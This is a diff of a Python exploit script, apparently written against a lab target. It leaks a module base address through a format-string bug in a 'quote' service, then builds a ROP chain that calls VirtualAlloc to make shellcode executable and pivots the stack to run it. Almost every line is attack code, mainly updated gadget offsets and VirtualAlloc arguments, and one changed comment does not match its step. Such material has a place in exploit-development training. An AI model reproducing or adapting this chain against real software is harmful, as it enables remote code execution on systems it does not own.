49 | 49 | | print("[+] Getting base address...") |
50 | 50 | | |
51 | 51 | | quote_id = unpack("<I", add_quote(b"%x " * 30))[0] |
52 | | - | base_str = get_quote(quote_id).split(b" ")[8].decode() |
| 52 | + | base_str = get_quote(quote_id).split(b" ")[2].decode() |
53 | 53 | | base = (int(base_str, 16) // 0x10000) * 0x10000 |
54 | 54 | | |
55 | 55 | | print(" -- " + hex(base)) |
95 | 95 | | |
96 | 96 | | rop = [ |
97 | 97 | | # 1. Get ESP (in eax) |
98 | | - | base + 0x2610, # xor eax, eax ; ret |
99 | | - | base + 0x1eb1, # or eax, esp ; ret |
| 98 | + | base + 0x25c0, # xor eax, eax ; ret |
| 99 | + | base + 0x1e69, # or eax, esp ; ret |
100 | 100 | | |
101 | 101 | | # 2. Get dummy call addr (in ebx) |
102 | | - | base + 0x2b88, # pop ecx ; ret |
| 102 | + | base + 0x2b38, # pop ecx ; ret |
103 | 103 | | 0x1ec, # eax + ? = dummy call |
104 | | - | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 104 | + | base + 0x9b36, # add eax, ecx ; pop ebx ; ret |
105 | 105 | | 0xffffffff, # junk for pop ebx |
106 | | - | base + 0x1ebb, # mov ebx, eax ; ret |
| 106 | + | base + 0x1e73, # mov ebx, eax ; ret |
107 | 107 | | |
108 | 108 | | # 3. Deref virtualAlloc (in eax) |
109 | | - | base + 0x2b87, # pop eax ; pop ecx ; ret |
110 | | - | base + 0x4321c, # base + iat + virtualalloc |
| 109 | + | base + 0x2b37, # pop eax ; pop ecx ; ret |
| 110 | + | base + 0x43218, # base + iat + virtualalloc |
111 | 111 | | 0xffffffff, # junk for pop ecx |
112 | | - | base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
| 112 | + | base + 0x1e6c, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
113 | 113 | | 0xffffffff, # junk for pop edx |
114 | 114 | | |
115 | 115 | | # 4. Write virtual alloc to dummy |
116 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 116 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
117 | 117 | | |
118 | 118 | | # 5. Get shellcode addr (in eax) |
119 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
120 | | - | base + 0x2d3c, # mov eax, edx ; ret |
121 | | - | base + 0x2b88, # pop ecx ; ret |
| 119 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 120 | + | base + 0x2cec, # mov eax, edx ; ret |
| 121 | + | base + 0x2b38, # pop ecx ; ret |
122 | 122 | | 0x18, # eax + ? = dummy call |
123 | | - | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 123 | + | base + 0x9b36, # add eax, ecx ; pop ebx ; ret |
124 | 124 | | 0xffffffff, # junk for pop ebx |
125 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 125 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
126 | 126 | | |
127 | 127 | | # 6. Get dummy call addr + 0x4 (in ebx) |
128 | | - | base + 0x1eca, # add ebx, 0x4 ; ret |
| 128 | + | base + 0x1e82, # add ebx, 0x4 ; ret |
129 | 129 | | |
130 | 130 | | # 7. Write shellcode addr to dummy + 0x4 |
131 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 131 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
132 | 132 | | |
133 | 133 | | # 8. Get dummy call addr + 0x8 (in ebx) |
134 | | - | base + 0x1eca, # add ebx, 0x8 ; ret |
| 134 | + | base + 0x1e82, # add ebx, 0x4 ; ret |
135 | 135 | | |
136 | 136 | | # 9. Write shellcode addr to dummy + 0x8 |
137 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 137 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
138 | 138 | | |
139 | 139 | | # 10. Align esp with dummy call (ebx-8) |
140 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
141 | | - | base + 0x2b88, # pop ecx ; ret |
| 140 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 141 | + | base + 0x2b38, # pop ecx ; ret |
142 | 142 | | 0xfffffff8, # edx + ? = dummy call |
143 | | - | base + 0x1ece, # add edx, ecx ; ret |
144 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
145 | | - | base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret |
| 143 | + | base + 0x1e86, # add edx, ecx ; ret |
| 144 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 145 | + | base + 0x1e76, # xchg ebx, esp ; dec ecx ; ret |
146 | 146 | | ] |
147 | 147 | | rop = b"".join([pack("<I", r) for r in rop]) |
148 | 148 | | |
151 | 151 | | dummy = b"aaaa" # VirtualAlloc |
152 | 152 | | dummy += b"bbbb" # return <- shellcode addr |
153 | 153 | | dummy += b"cccc" # lpAddress <- shellcode addr |
154 | | - | dummy += pack("<I", 0x1) # dwSize <- 0x1 |
| 154 | + | dummy += pack("<I", 0x200) # dwSize <- 0x1 |
155 | 155 | | dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000 |
156 | 156 | | dummy += pack("<I", 0x40) # flProtect <- 0x40 |
157 | 157 | | |